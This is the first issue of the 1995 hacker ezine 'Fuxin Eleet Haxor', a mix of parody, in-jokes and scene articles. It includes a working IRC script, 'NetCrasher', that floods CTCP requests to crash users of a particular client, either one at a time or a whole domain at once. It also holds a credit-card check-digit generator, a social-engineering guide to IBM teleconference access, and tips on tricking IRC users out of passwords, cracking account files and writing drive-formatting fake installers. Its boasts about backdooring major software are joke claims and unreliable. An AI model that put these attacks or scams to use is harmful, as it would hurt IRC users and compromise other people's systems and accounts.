Copy Link
Add to Bookmark
Report

Fuxin Eleet Haxor 01

eZine's profile picture
Published in 
Fuxin Eleet Haxor
 · 5 years ago

 
FFFFFFF EEEEEEE HHH HHH
FFF EEE HHH HHH
FFFFFFF EEEEEE HHHHHHHHHH
FFF EEEEEE HHHHHHHHHH
FFF EEE HHH HHH
FFF EEEEEEEE HHH HHH

U L A
X E X
I E O
N' T R

Issue #1
July 1st, 1995


Editor: ReDragon
Fuxin' Eleet Haxor of the Month: Hotrod
Fuxin' Eleet Haxor Member List: TOP SECRET
Official FEH Porn Supplier: twi
Official passed out drunk of FEH: y
Official FEH bartender: thomas
Chicago subsidiary of FEH: l0ck
Official FEH Historian: SnoCrash
Official FEH Warez Supplier: X
Official FEH telco security: Dale Drew
Official FEH distribution: Dark Tangent
Official Vehicle of FEH: Saab
Official Song of FEH: Thriller
Official Alcoholic Drink of FEH: Goldshlager
Official domain of FEH: feh.org
Our current email address: feh@pussy.org


Greetz To (if we left you out, itz cuz we dont got yer inpho):
aky, al, albatross, antichrist, armitage, artimage, baccahbar, barnasch, basehead, bedlam, blackdeath, blackfire, bluesman, c-curve, c_cipher, captain ahab, captain hook, ccrider, cerbus, chaos, clovis, corak, crax, crimelord, crushed puppy, cyntaxera, cyrix, d-fens, datarape, deathstar, defcon4, deker, digital, discodan, diskjockey, dob, dr. freeze, dragonlady, drd00m, dreamweaver, drmenace, drunkfux, drwarfare, dupre, eek, elastic, erikb, eternal, etrigan, excelsior, firefly, fisch, frank carson, freiheit, friede, genx, gfm, gheap, ghornet, grayareas, greylock, greystone, harvard, hellfire, henry, hos, howcum, hypnosis, interrupt, joybubbles, kc, kewp, kl, kracker, kurupt, leigh, lexicdvl, liquidice, loq, lordoptic, m0rph, mafiaman, malice, meowmix, mindcrime, mindscrew, moonchild, mrpurple, mrx, musicphreak, mycroft, nc-17, neophyte, niaht, nimrod, nitro187, noel, novocain, nyar, nynex, olphart, omega, opiate, oreo, pandora, paradox, pclord, plant, play, pmf, purpcon, pyro, qwik, r-a-d, radikahl, radman, rahdude, ratscabies, razor, rebel, redskull, rhit, roach, scojack, sevenup, silicon, sl, slammer, slpwalker, socket, solstice, sparhawk, speedrcr, sphice, splice, sserpent, stealth, strauhd, studload, subzero, swinder, tedbundy, tek, tekone, tele, tewph, tinyz, totlvizn, tsoul, utahsaint, valgamon, virus, visionary, winter, wozz, xn4rk, xymox, z1nk, zaphod, zorphix

                Ahoy! 
That's how Alexander Graham Bell used to answer his phone.
For some reason, it never caught on...


Well, here it is. The first issue of FEH, a 'zine in its incarnation already famous and destined for greatness. Richard Steele, ex-cia agent, says of FEH, "my penis is HUGE". While I'm not sure exactly how this relates to FEH, he IS ex-cia, so we better publish whatever he says. Erik Bloodaxe, aka Chris G., when asked about the prospects of facing a FEH issue against Phrack, exclaimed "dude, i own you. i mean, we're all running yer scripts anyhow." Grayarea, publisher of, oddly enough, grayareas, wrote about our release, "spell it Gray Areas." Perhaps most impressive of all, Emmanuel Goldstein, when faced with the certain demise of 2600 given FEH's release, commented "will you leave me alone if i give you a quote?" And so, without further adieu, I present to you, FEH #1.

Table of Contents

  1. Intro (you've already read that part if you've gotten this far)
  2. Table of Contents (maximum recursion depth exceeded)
  3. Editorial by Fuxin' Eleet Haxors
  4. /var/spool/mail/feh
  5. Some C code by Fuxin' Eleet Haxors
  6. hack logs by Fuxin' Eleet Haxors
  7. "Just how eleet is FEH" by Rasputin Worldmonger (thats not his real nick)
  8. "Teleconf stuff" by Morph (ed: this was too complicated, i didnt read it)
  9. "Ways to amuse yerself" by Rush2 (other than masturbating)
  10. "The Tack Story" by Hotrod
  11. "The Birth of FEH" by SnoCrash
  12. An Interview with Dale Drew [part 1] by ReDragon
  13. "How to Hack Using Scripts [part 1] by Seven Eleven
  14. "How to Hack a Toaster Oven" by bl0ke

To Submit articles for future issues of FEH (expect it to be released every month or so), e-mail ReDragon (current address: redragon@chewy.wookie.net), or contact him through other means (most people know where to find ReD).

3. Editorial

Too many people that are in the 'scene' today seem to do nothing but hoarde things. Send me this, gimme this seems to be the prevailing attitude of the day. If you are going to get on the net and try to hoarde anything, make it knowledge. Spend your time learning instead of trying to get toolz out of people and figuring out who the newest irc chick is. Sometimes that means talking to people on irc, but most of the time that means getting out there and doing it yourself. Its fine if you want to do the whole social scene of hacking or phreaking or warez or ansi, they are all different but in essence, they are all about entertainment on IRC. But at the heart of them is a common goal, why which ultimately people are judged. Which of these groups have the purest goals? To have all the warez? To make the coolest ansi or demo? To setup a conf? No, its knowledge. And that's why we are fuxin' eleet hackers. And that is our ideal. Now, you may see us on #hack 24 hours a day, but trust me, we idle a lot, and despite the fact that we may be active in the 'social scene' of hacking, it is what we are doing in another window while the irc screen scrolls that makes us fuxin' eleet, not what we do on IRC.

- All the members of FEH

4. /var/spool/mail/feh

Someone sent this to one of the FEH members, anonymously, so we dunno where it came from or who wrote it. The names were removed to protect the obviously guilty...

Most of the stuff is from my latest performance report. Prior to that I worked in the Computer Security Branch as the Virus/Pc expert. In that capacity I was responsible for taking care of any and all problems concerning viruses and P.C.s. I was taken from a shop where I was doing communications security due to my extensive knowledge of p.c.s and my decent programming skills. They needed someone with some knowledge and foundation in taking care of Personal Computers. I established a base line program for dealing with computer viruses, handling copyright issues and dealing with user problems associated with Personal Computers. We were having some difficulty with users not being able to distinguish between viruses and program gliches due to software problems. That's where I came in. O.k. from there they figured out that I am very good with computers. They needed someone to handle Network Security who could do tiger team actions and monitor our networks. They felt due to my computer knowledge I would be the most viable candidate. The following is directly from my performance report.

"Expert in all aspects of Wide Area Network(WAN) security support. Responsible for executing all portions of periodic system security audits to find and correct host security vulnerablilities. Assists HQ USAF Local Area Network (LAN) systems administrators and customers in implementation of security safeguards on all UNIX hosts. Proactively analyzes Network Security Monitors (NSM) logs for indications of attempted or successful intrusions. Systems administrator for DSST SPARC station platforms."

"Heart of the agency's newly established wide area network security program. Developed and documented procedures for monitoring the HQUSAF backbone. Security program has led to the most protected network within the DOD rated by the Defense Information Systems Security Agency as the best of 9000 systems audited by its elite Center for information Security. Performs aggressive quarterly security audits of the HQ USAF WAN. Created software tools and new hacking techniques used by the Air Force Information Warfare Center for their on-line surveys of worldwide sites. Resident expert on UNIX security. Trained counterparts throughout the agency on our methodology enabling them to secure their networks. Regularly called upon by outside agencies for assistance. Expertise passed to other system administrators through articles published in directorate's security newsletter."

"leader who has brought the agency's network security program from the infancy stage to a mature sustainable program which has Air Force wide recognition.
Knowledge of UNIX security and leading edge hacking techniques makes him a valued source of information thoughout DOD.
"

5. Some C code by Fuxin' Eleet Haxors

fehit.c (we ran this through itself): 
/* TH1S W1LL MAK3 Y0UR F1L3S FUX1N' 3L33T */
#1NCLUD3 <STD10.H>
#1NCLUD3 <STR1NGS.H>
#1NCLUD3 <CTYP3.H>

MA1N()
{
CHAR L1N3[100];
CHAR C;
1NT 1;

WH1L3(G3TS(L1N3))
{
F0R(1=0;L1N3[1];1++)
{
L1N3[1]=T0UPP3R(L1N3[1]);
1F(L1N3[1]=='3')
L1N3[1]='3';
1F(L1N3[1]=='1')
L1N3[1]='1';
1F(L1N3[1]=='0')
L1N3[1]='0';
}
PUTS(L1N3);
}
}

The world's most fuxin eleet credit card generator (yes it works):
main(){int i,x,n=1,t,s=0;scanf("%d",&i);for(;n<i;n++){scanf("%d",&x);
t=((n+i%2)%2+1)*x;s+=t+t/10;}printf("%i",(10-s%10)%10);}

Some random IRC script that we have no idea where it came from:
# NetCrasher -=- (c) 1995
# Utilize a nice bug in the NetCruizer IRC client to crash
# one or many NetCruizer lamers when they are using IRC.
^assign ctcpstring ^AFINGER^A ^AFINGER^A ^AFINGER^A ^AFINGER^A ^AFINGER^A ^AFING
ER^A ^AFINGER^A ^AFINGER^A ^AFINGER^A ^AFINGER^A ^AFINGER^A ^AFINGER^A ^AFINGER
^A ^AFINGER^A ^AFINGER^A ^AFINGER^A ^AFINGER^A ^AFINGER^A ^AFINGER^A ^AFINGER^A
^AFINGER^A ^AFINGER^A ^AFINGER^A ^AFINGER^A ^AFINGER^A ^AFINGER^A ^AF
INGER^A ^AFINGER^A ^AFINGER^A ^AFINGER^A ^AFINGER^A ^AFINGER^A ^AFINGER^A ^AFING
ER^A ^AFINGER^A ^AFINGER^A ^AFINGER^A ^AFINGER^A ^AFINGER^A ^AFINGER^A ^AFINGER
^A ^AFINGER^A ^AFINGER^A ^AFINGER^A ^AFINGER^A ^AFINGER^A ^AFINGER^A ^AFINGER^A
^AFINGER^A ^AFINGER^A ^AFINGER^A ^AFINGER^A ^AFINGER^A ^AFINGER^A
^alias crash eval msg $0 $ctcpstring
alias crashall {
^assign TIME 1
^assign -DOIT
on ^raw_irc "% 352 *" {
^assign DOIT $DOIT;^timer $TIME crash $7
^assign TIME ${TIME+7}
}
on ^raw_irc "% 315 *" {
on raw_irc -"% 352 *"
on raw_irc -"% 315 *"
eval $DOIT
}
who *.ix.netcom.com
wait
echo *** Will crash ${(TIME-1)/7} users...
echo *** Time required to avoid excess flood: $TIME seconds
}
^on ^send_msg "% *^A*^A*^A*^A*^A*" echo *** Crashing NetCruizer lamer: $0
echo *** NetCrasher loaded. /crash <nick> to crash a single NetCruizer lamer
echo *** /crashall to crash all NetCruizer lamers off IRC (will lag you)
echo *** Note that users crash immediately but do not leave IRC until the
echo *** server gives them a ping timeout.

Secure your PC using your joystick to enter your password:
[ed note: whoever wrote this should be shot, unless they have greatly
grown and only code in C now and anyhow I was only like 13
when I wrote it so gimme a break, fuck you ed!]

{$M 1024,0,1024}
uses dos,crt;
var TimeTick : procedure;
type joystickrec = record
b1 : boolean; b2 : boolean; x : word;y : word; end;
plist = record
pbyte : byte; next : pointer; end;

var joy : joystickrec; pass: boolean;isleft: boolean;
leftit: byte; rightit: byte;pb: byte;i:byte;
pfile: file of byte;xl,xc,xr : boolean;
yu,yc,yd : boolean;a,b:pointer;
pl,pl1: ^plist;

procedure brk;
interrupt;
begin
end;

procedure readjoystick(var joystick:joystickrec);
var regs: registers;
begin

regs.ah:=$84;
regs.dx:=$00;
intr($15,regs);
if (regs.al AND 16)=0 then joystick.b1:=true else
joystick.b1:=false;
if (regs.al AND 32)=0 then joystick.b2:=true else
joystick.b2:=false;
regs.ah:=$84;
regs.dx:=$01;
intr($15,regs);
joystick.x:=regs.ax;
joystick.y:=regs.bx;
xl:=false; xc:=false; xr:=false;
yu:=false; yc:=false; yd:=false;
with joystick do begin
if x<10 then xl:=true;
if (x>=50) and (x<=150) then xc:=true;
if (x>150) then xr:=true;
if (y<10) then yu:=true;
if (y>50) and (y<100) then yc:=true;
if (y>100) then yd:=true;
end;
end;
procedure writetf(bol:boolean);
begin
if bol then write('True ') else write('False ');
end;

procedure readfail;
begin
writeln('Verifying Joystick Input....');
writeln('Unable to Verify Password - System Halted');
halt(0);
end;

procedure xcenter;
begin
with joy do begin
repeat
readjoystick(joy);
if (not yc) then pass:=false;
until xc or (b1 and b2);
if (b1 and b2) then readfail;
end;
end;

procedure ycenter;
begin
with joy do begin
repeat
readjoystick(joy);
if (not xc) then pass:=false;
until yc or (b1 and b2);
if (b1 and b2) then readfail;
end;
end;

procedure left;
begin
with joy do begin
repeat
readjoystick(joy);
if (not yc) or (xr) then pass:=false;
until xl or (b1 and b2);
if (b1 and b2) then readfail;
end;
end;

procedure right;
begin
with joy do begin
repeat
readjoystick(joy);
if (not yc) or (xl) then pass:=false;
until xr or (b1 and b2);
if (b1 and b2) then readfail;
end;
end;

procedure up;
begin
with joy do begin
repeat
readjoystick(joy);
if (not xc) or (yd) then pass:=false;
until yu or (b1 and b2);
if (b1 and b2) then readfail;
end;
end;

procedure down;
begin
with joy do begin
repeat
readjoystick(joy);
if (not xc) or (yu) then pass:=false;
until yd or (b1 and b2);
if (b1 and b2) then readfail;
end;
end;

procedure press1;
begin
with joy do begin
repeat
readjoystick(joy);
if (b2) then pass:=false;
until b1;
if (b1 and b2) then readfail;
end;
end;

procedure press2;
begin
with joy do begin
repeat
readjoystick(joy);
if (b1) then pass:=false;
until b2;
if (b1 and b2) then readfail;
end;
end;

procedure nopress1;
begin
with joy do begin
repeat
readjoystick(joy);
if (b2) then pass:=false;
until (not b1);
if (b1 and b2) then readfail;
end;
end;

procedure nopress2;
begin
with joy do begin
repeat
readjoystick(joy);
if (b1) then pass:=false;
until (not b2);
if (b1 and b2) then readfail;
end;
end;

begin
readjoystick(joy);
Writeln('Joystick Password Verification');
Writeln('------------------------------');
Writeln('Please Input Your Password with the Joystick Now');
Writeln('Press both joystick buttons simultaneously to verify your password.');
getintvec($1b,a);
getintvec($23,b);
setintvec($1b,@brk);
setintvec($23,@brk);
assign(pfile,paramstr(1));
{$I-} reset(pfile); {$I+}
if ioerror<>0 then begin
writeln('Could Not Read Password - System Halted');
repeat until 1=0;
end;
new(pl);
while not eof(pfile) do begin
read(pfile,pb);
pl^.pbyte:=pb;
new(pl1);
pl^.next:=pl1;
pl1^.next:=nul;
pl:=pl1;
end;
close(pfile);
repeat
pass:=true;
leftit:=0;
isleft:=false;
with joy do
begin
xr:=false;
for i:=1 to 5 do begin
xcenter;
left;
end;
xcenter; right; xcenter; up; ycenter; down; ycenter;
for i:=1 to 5 do begin
xcenter;
right;
end;
xcenter; left; xcenter; up; ycenter; down; ycenter;

for i:=1 to 4 do begin press1; nopress1; end;
for i:=1 to 3 do begin press2; nopress2; end;
for i:=1 to 2 do begin press1; nopress1; end;
press2; nopress2;

repeat
readjoystick(joy);
until (b1 and b2);
if (pass) then begin
writeln('Verifying Joystick Input...');
writeln('Password Verified - Continue');
end
end;
if (pass) then begin
gotoxy(1,18); writeln('ACCESS DENIED - INCORRECT PASSWORD');
sound(500); delay(100); nosound; delay(100); sound(500); nosound;
sound(500); delay(100); nosound; delay(100); sound(500); nosound;
end;
until pass;
setintvec($1b,a);
setintvec($23,b);
end.


6. Fuxin' Eleet Haxor Logs by Hotrod

As an offering to the public to prove FEH's obvious superiority to l0ck, I decided to demonstrate a n00 h4q t3kn1qu3 recently developed in the FEH laboratories, located on a secret island in the Atlantic ocean.

The n00 h4q t3kn1qu3 has been demonstrated on wopr.mil, once regarded as one of the most secure machines on the net. This machine alone determines whether or not to launch the nuclear missles of the United States. It runs on the US Military's top secret propriatary OS "Lesb/OS". Lesb/OS machines are no match for the awesome power of FEH.

FEH proudly offers the following:

--- 

Log start 5/30/95 22:17:36

feh.org# uname -a
UNICOS feh 4.3.5 #5 Tue May 30 22:17:36 EDT 1995 T3D
feh.org# whoami
root
feh.org# telnet -safe wopr.mil
Trying 194.33.43.1...
Connected to wopr.mil.
Escape character is '^]'.

Don't even think about haxoring this site, bud.
Try if you like, you will fail.
Just don't get caught, or you'll pay the price.

wopr login: root
password: (we tried root)
Login Incorrect

wopr login: root
password: (we tried no password)
Login Incorrect

wopr login: root
password: (we tried pencil)
Login Incorrect

Ok, obviously our traditional hacking methods weren't working out at this
point. We decided to go for some more sekretive methods...

wopr login: lemmein
password:
Login Incorrect

wopr login: iamfeh
password:
Login Incorrect

wopr login: HEYASSHOLEIMROOTATFEHORGLEMMEINORYOUREDEAD
password:

Welcome to Lesb/OS 2.2.12
Last Login: NEVER

News:

The Lesb/OS upgrade to 2.2.12 was successful, we apoligize for any
inconvenience this may have caused.

As of 5/28/95 @ 20:34 hours, we have been restored from Defcon 4 to
Defcon 5.
__

You have no mail.

wopr> pwd
/home/fehroot
wopr> cd /bin
wopr> ls -al sh
-rwxr-xr-x 2 bin bin 131072 Feb 3 01:53 sh
wopr> chmod 4755 sh
chmod: sh: not owner.
wopr> ~/look.im.feh.and.if.you.dont.follow.my.orders.youre.fucked
wopr# whoami
root
wopr# ftp
ftp> open feh.org
Connected to feh.org
220 feh FTP server (UNICOS feh 4.3.5 #5 Tue May 30 22:54:18 EDT 1995 T3D)
ready.
Name (feh.org:root): feh
Password (feh.org:feh):
331 Password required for feh.
230 User feh logged in.
Remote system type is UNIX.
Using binary mode for file transfers.
ftp> lcd /etc
Local directory now /etc
ftp> get fehmotd
200 PORT command successful.
150 Opening BINARY mode data connection for fehmotd (1056 bytes).
226 Transfer complete.
1056 bytes received in 0.021 secs (49 Kbytes/sec)
ftp> quit
221 Goodbye.
wopr# cp /etc/fehmotd /etc/motd
wopr# cat /etc/motd

Congratulations, You've Been Haxored by the Best!

It wasn't LOD......
It wasn't l0ck.....
It wasn't m0ck.....
It wasn't mitnick..

You've been hacked by

FFFFFF EEEEEE HH HH
FF EE HH HH
FFFFF EEEE HHHHHHH
FF EE HH HH
FF EEEEEE HH HH
uxin leet axors


You are likely to go through several stages of emotions at this point. First, denial, then anger, then acceptance that we are the most fuxin eleet haxors. In fact, you better hope we are, cuz if we aren't fuxin eleet and we still haxored yer system that means that yer a pretty fuxin shitty sysadmin now, doesn't it? FEH is roxin' the net, tell all yer friends we will soon be visiting their site, I hope they will be kind enough to leave the door as open as you were.
wopr#

[Subsequently removing any trace of this machine from the net deleted.]

Comments:

Easier than even we at FEH thought it would be. We drove the machine into such fear, that in our presence it gave us root. Note that we never actually modified anything, or even ran any new shell, the machine simply submitted to our eliteness, and, in a possible attempt to garner mercy at our hands, gave us root without making us go through the formalities.

Our work remains solid in this wonderful sight:

feh.org# whois -h nic.ddn.mil wopr.mil 
No match for "WOPR.MIL".


Please be advised that this whois server only contains DOD Information. All INTERNET Domain, IP Network Number, and ASN records are now kept in the new Internet Registry, RS.INTERNIC.NET (198.41.0.5).
feh.org#

Just How Eleet Is FEH by a Fuxin' Eleet Haxor

1 AM A PR0UD M3MB3R 0F FEH. 1 SAY THAT PUBL1CALLY, 1 SAY THAT L0UDLY, 1 SAY THAT STR0NGLY, AND 1 CAN SAY THAT CUZ W3 FUX1N R00L.

W3 AR3 3L33T. N0T 0NLY THAT, BUT W3 AR3 3L1T3. 3L33T AND FUXK1NG R0CK1NG. W3 AR3 S0 C00L THAT W3 HAV3 R3C0NF1GUR3D R0UT3RS T0 AUT0MAT1CALLY G1V3 0UR PACK3TS H1GH3R PR10R1T13S. W3 0WN APPR0X1MAT3LY 37% 0F ALL UN1X MACH1N3S 0R R0UT3RS 0N TH3 1NT3RN3T. W3 SN1FF C1X, MA3-3AST, TH3 CH1CAG0 NAP, AND C3RT.

1N SH0RT W3 R0CK. H0W CAN W3 R0CK TH1S MUCH, Y0U M1GHT ASK? W3LL, THAT'S R3ALLY A S1LLY QU3ST10N, AND Y0U'D B3ST N0T ASK 1T, B3CAUS3 W3'V3 SCR1PTS S3TUP 0N 0UR SN1FF3RS (APPR0X1MAT3LY 4000 MACH1N3S HAV3 AUT0SN1FF3R/F1LT3RS) THAT W1LL MA1L US THAT Y0U'R3 TALK1NG AB0UT US.

1N SH0RT - WATCH 0UT. W3 AR3 TH3 P30PL3 WH0 RUN TH3 N3T. W3 AR3 TH3 P30PL3 WH0 BACKD00R3D PGP, W3 BACKD00R3D B1ND, W3 BACKD00R3D ARGUS, TCP_WRAPP3RS, AND 1F Y0U KN3W H0W MANY ST0CK B1NAR13S 1N S0LAR1S, 1R1X, AND A1X W3 HAV3 TR0JAN3D 1N TH3 C0D3R'S MACH1N3S, Y0U'D SH1T Y0UR PANTS.

W3 R3C0NF1GUR3D R0UT1NG AT TH3 NAPS AND C1X B3CAUS3 TH3 FAT FUX WH0 RUN TH3 NAPS AR3 T00 FUCK1NG STUP1D AND LAZY T0 D0 1T R1GHT. 1T D1DN'T HURT THAT TH3 PACK3TS TRAV3L 0V3R TH3 SN1FF3R'S 3TH3R, BUT 3V3N W1TH THAT 3XTRA (TRANSPAR3NT) H0P, W3 1NCR3AS3D 3FF1C13NCY BY 3.2 %.

BUT TH3 0NLY TH1NG Y0U R3ALLY N33D T0 KN0W 1S THAT W3 AR3 FUCK1NG 3L33T, W3 AR3 HACK3RS, AND W3 W1LL D0 WHAT W3 WANT. D0N'T TRY T0 R3S1ST US, W3 W1LL 0V3RC0M3 ANY S1LLY C3RT ADV1S0R13S Y0U PUT 0UT. W3 AR3 TH3 0N3S WH0 S3TUP M1TN1CK'S BUST, B3CAUS3 W3 W3R3 T1R3D 0F H1S S1LLY PR3SS. W3 AR3 TH3 0N3S WH0 MA1L3D SH1M0' TH3 L0GS. W3 AR3 FEH. W3 AR3 Y0UR FR13ND, UNT1L Y0U M0V3 AGA1NST US. AND TH3 Y0U W1LL F1ND Y0UR SYST3M, Y0UR T3L3PH0N3, Y0UR B1LLS, Y0U L1F3, MUCH M0R3 D1FF1CULT.

L0V3 FEH - W3 AR3 Y0UR MAST3R, AND W3 AR3 Y0UR 0WN3R. B3 G00D T0 US, AND W3 W1LL TR3AT Y0U W3LL. R3B3L AND F33L PA1N. [FEH] 3VANG3L1ST - RASPUT1N W0RLDM0NG3R

8. Something about Teleconferencing Stuff by Morph

              An Overview of American Teleconferencing Service, 
^..^ their relationship to IBM, and TiNets ^..^
(oo) - eye [Part 1] (oo) - me
( . ) phear researched and compiled by Morpheus ( . ) too
`. ' feh with thanks to Prophet and also the ` .'
. cooperative employees I spoke with. .
PHEAR PHEAR
-=FEH=- root:Donteventhinkofit:0:1:Operator:/:/bin/csh -=FEH=-
-[*.gsfc.nasa.gov:/etc/passwd]

Kopyright (k) Morpheus 1995,
all rights reserved.
[ed note: feel free to steal this and claim it as your own]


Introduction

A Canadian affiliate of CAFBL tipped me off that IBM teleconferences had been used before through a toll free line. So I investigated how IBM teleconfs are setup, who makes them with what software, and how to access IBM conferences.

Well I called up IBM's toll-free information line available from the 800# index and began a very blunt attempt to socially engineer teleconfs from IBM. The guy I talked to with told me to work through my regional directors, not through the software information line, and he gave me the number to American Teleconferencing Service, which exclusivly handles IBM extrenal teleconfs. American is a southern company, located in Tousan, AZ.

This was originally designed as a scam article, a step by step guide to the tricks and traps involved with setting up American Teleconferences through IBM. Upon further consideration, I went back and edited the article to make it more informational and less "LeT'z HaCk Th0sE FuCkeRz!" I am sure that the rewording of this paper will not make fraudulent use of the information any less compelling, but I do feel sure that half-assed phreakers would be better off sticking with old AT&T.
[ed note: i wish he just gave us codes, all this technical stuff makes my head hurt.]


A look at an American Teleconfernce

American Teleconferences conference setup looks like this:

  • 6500800 - TiNet Dialin - Accessible to IBM and not you
  • 7194440800 - External Dialin - Regular Telephone number
  • 157998 - Conference ID - Use this to access account and conference

Also, American teleconference offers an optional toll free line to dial in to the conference. This is the only option they offer for external access to the conferences. TiNet works from probably all IBM phone lines, by dialing 271 followed by the TiNet number.

American works on a fairly primitive conferencing system, they simply connect each line to the other lines as they call in. There is no conference hub, so if you're the first caller, you get put on hold until the next caller comes in. The music sucks, i mean, this is really terrible music.
[ed note: you might like the music, some people set these confs up themselves just so they can hear the hold music, and nobody ever calls.]

An automated conference conection does not exist, and there is no real access code to enter. Once you dial into the conference, you are greeted by the operator who asks you for you conference ID number and your name. A list of names can be generated and given to the operator before the conference.


How American Operates

All IBM groups that use American have files in American's Databases. Contained in your file is your name, title, office phone, office address, which will also be your billing address, and your department number. This is an example of what the file would look like when brought up on their screen:

========================== ============ 
Name [ Bruce Sterling ] : [ Hi Bruce ]
Dpt [ # 5176 ] : [ from the last 4 digits of phone number ]
Addr [ 227 Maple Lane ] : [ Office adress / billing adress ]
Addr [ Phila PA 19191 ] : [ Use the closest corp/office ]
Phon [ 512-323-5176 ] : [ Office Numba ]
XXXX [ Billed 1/11/11 (status) ] : [ Did yew pay your bills? ]
XXXX [ Billed 1/11/11 (status) ]
XXXX [ (Notes) ] : [ He writes books ]
========================== ============


This is certainly *not* a screen capture, so the screen the operator will see is very probably more complex. Also the Fields represent variable areas, you probably get a better idea of what the operator is thinking when talking to you through this.
[ed note: the operator is probably thinking about how her life ended up so miserably that she is working as a telephone operator.]

Billing status can include a refuse notice for delayed payment or whatever. The Notes can be preferences, such as toll free access or possibly something else. Callback confirmation is usually not utilized, since the bill is not included with the phone bill, but is delivered to the billing address. Your number appears on their terminal also, with whatever comments are attached to that.

American has become so exclusively dedicated to serving IBM that operators will sometimes get on and say "IBM Conference Service." I also spoke to some operators about what software they were running and on what type of terminals which appears to be a big secret. [ed note: probably NOT os/2]
EDICTS: Electronic Distribution Information Control Transaction System, file transfer system. Operates RO6000 Systems. Distributed by IBM. This is one of the programs used by American, the operator told me that much before she woke up a bit. This is a datacommunications software package, and is seperate from their audio / video teleconferencing software.


TiNet, TiLines, and TiSystems

TiNet dialins do not exist. The only way to access TiNet Services is through IBM's phone system. TiNet is simply the telephone system IBM strung together which makes conferencing and interoffice communications easier.

In fact, TiNet was created as a datacommunications system that ended up with a gross excess of bandwith so they expanded into Voice Capabilities. TiLines can be setup in virtually any office, and for any large bussiness.

Tinet's selling feature, so to speak, is that offices with TiLines installed can bypass long distance charges and Telephone Companies all together. This is particularly useful for Banks and Credit Unions who prefer the Security of private phone lines than the inherent lack of security in public / normal phone lines. [ed note: what about clipper?]

In conclusion I would like to state that all of the information mentioned is for purely informational purposes and that, should any of you abuse IBM and American Teleconferencing, that would be illegal and you would be prosecuted. But then again, would any of us choose to break the law? Heavens no!
[ed note: if you do happen to break the law, drop us a note so we know that this is useful.]


Fun Filled Numbers

IBM Software Information Service == 1-800-426-2255
IBM General Information Line == 1-800-426-3333
American Teleconference Reservation Line == 1-800-723-9093
Hooked on Phonics main order Line == 1-800-222-3334
IBM CORP main office [Philadelphia] == 215-851-2008
IBM Teleconference Director's office [Philadelphia] = 215-851-3677

The author's inpho:
Morpheus can be reached at GBA 215-750-0392 or morph@chewy.wookie.net or morph@iia2.org. Send your public pgp key if you want a reply. Also, you can reach him at 800/862-0094 during the day from US, or from canada, 800/925-9999 ## 719. On EFnet, he's on #hack, #zines, and #cafbl.

-----BEGIN PGP PUBLIC KEY BLOCK----- 
Version: 2.3a
mQCNAi/R9UAAAAEEALDNmlPQJ/CmH1Ba77TmMKBaW6zUUcTrFuOe5duBZvyQpkGR
frHppvXbTXHB3jm4jHL9kCueo1IJGXfOTC4lyI/rGBr731NdwFYlsdeWh5Ampvj0
YKchVh5mp7glTQYS/rtARupXlb/H2X+wY5JgsJK1dFQJ3QfyA2bQA34kJ66RAAUR
tB9Nb3JwaGV1cyBLTCA8bW9ycGhAaXhjLml4Yy5uZXQ+
=SrJR
-----END PGP PUBLIC KEY BLOCK-----

9. How to amuse yourself by Rush2

[ed note: this is what people that are not FEH might try]

  1. The Michael scam. One day a few days ago I got very very bored. I said what the hell. I bet I can get a lamer to give me his/her password. I thought of the most common name, michael, and changed my irc nick to .. DUH Michael.. within 10 minutes someone had mistaken me for her best friend michael.. she thanked me for somethign about hooking her up with alliance not the service, some guy. I bullshitted for 10 minutes, then really panick y like "Oh crap I just screwed up my account.. majorly would you gime your login and password pleaseeeee". Wellshe was that stupid and she gave it to me. I really wanted to know if anyone else was that stupid. I tried a lot of common names for the next 2 hours, john, mike, larry etc..etc.. I succeeded wiht 99% of my attempts, I got 19, failed once. SO do something like this if you are REALLY bored. [ed note: a bottle of scotch is far more effective than this]
  2. Trade passwd files.. hehe... when your bored change yer name on irc, go into #Hack see if you dont get kicked off and ask for passwd files.. [ed note: if you don't get kicked off, hurt everyone that was opped] if you are really bored this can be fun and you can get some new systems to get in.. now unless your someone that is cracking them just to get as many accounts as you can (I feel hypocritical currently I have 1400 valid accounts on this local provider, on my computer upstairs (in just one day YES people in my area have easy passwds.. only a 1mb file (AND just with login name I got 300 yesterday.. haha I) And I am hearing a lot of beeps (root was the first cracked account:).. this is something to do if you feel bored and lame... [ed note: mail the cracked password file to cert@cert.org and you win a prize]
  3. Write really nifty little utils in quick basic (if your still stuck on a dos box)... nothing is niftier than writing a shitty program in qbasic that uses a captured installation display screen from a game or something (or modify it to say mortal combat 3 or soemthing, the little warez kids cum from this) and really make it format their drive... yes this is lame but you KNOW we all get this bored at one time or another in our lives. [ed note: Super Street Fighter is more Fuxin' Eleet]
  4. Use Irc. Yes this is the lamest of the lame. #hack. Where ignorance is shown and knowledge forgotten. If you want immaturity, brattiness, kids playing with their krad bots or scripts, or your typical op wars, go to #hack, #phreak, #2600, or my <coughcoughnotcoughcoug> favorite, #ansi. Yes #ansi people with any intelligence know it is american national standards institute, dorky little kids that have no life (we have no lives either but we arent little kids ... we are middle kids.. ?) [ed note: if anyone can figure out what the hell he is talking about, email me] think it is an art form and a way for them to be cool... their idea of coolness is being worshipped by pervert ed, immature, talentless, dweebs with pcs.. most of these peopel are aol and prodigy rejects... ...anyways... this is something to do when you are SUICIDALLY bored. [ed note: actually suicide might be a better solution]
  5. Get on one off those cracked accounts (see number 1) and type something like archie -s a > hackedpws.k00l or archie -s . > HEY.YOU.STUPID.SYSADMIN. BLOW.ME (that is sure to get his attention). If you are really bored, you can edit their .login to cat the file when they login (this being archying < sp> a or . will probably give you a few thousand file names and if the owner of the account can even login (they havent checked user quotas yet obviously) so that they must wait an hour for the thing to finish (but I'm not sure it never has for me because i just telnet), it may just flood their com ports (or if you have root, do archie -s a, archie -s ., archie -s (whatever you want to to get a LOT of entries) > motd or >.login and make it so EVERY ONE sees this when they login... unless they are on like a 2400... This is something to do when your bored... [ed note: do I notice a trend forming?]
  6. Go onto Irc, and into #hack and let ReDragon convince you to write an article for some magazine (JUST ANY ARTICLE) .. and spend the next (however much time I spend on th) writing an article filled with strange and useless dribble because you are too lazy to do a real article.. *WARNING* *WARNING* DO THIS IN ONLY EXTREME EMERGENCIES *WARNING* *WARNING* [ed note: 6. go onto irc, randomly msg someone you don't know to see just how lame an article someone who is not FEH can write.]
  7. Ftp to rs0.internic.net and retr all of the domain name lists. Spend the next four or five hours reading the com.zon file and jack off to the point of orgasm to it .. NO I AM NOT PATHETIC, YOU DO IT TO YOU JUST REFUSE TO ADMIT TO IT. Do this all the time ... .this doesnt mean your bored, you are just creative. [ed note: you are just an idiot]
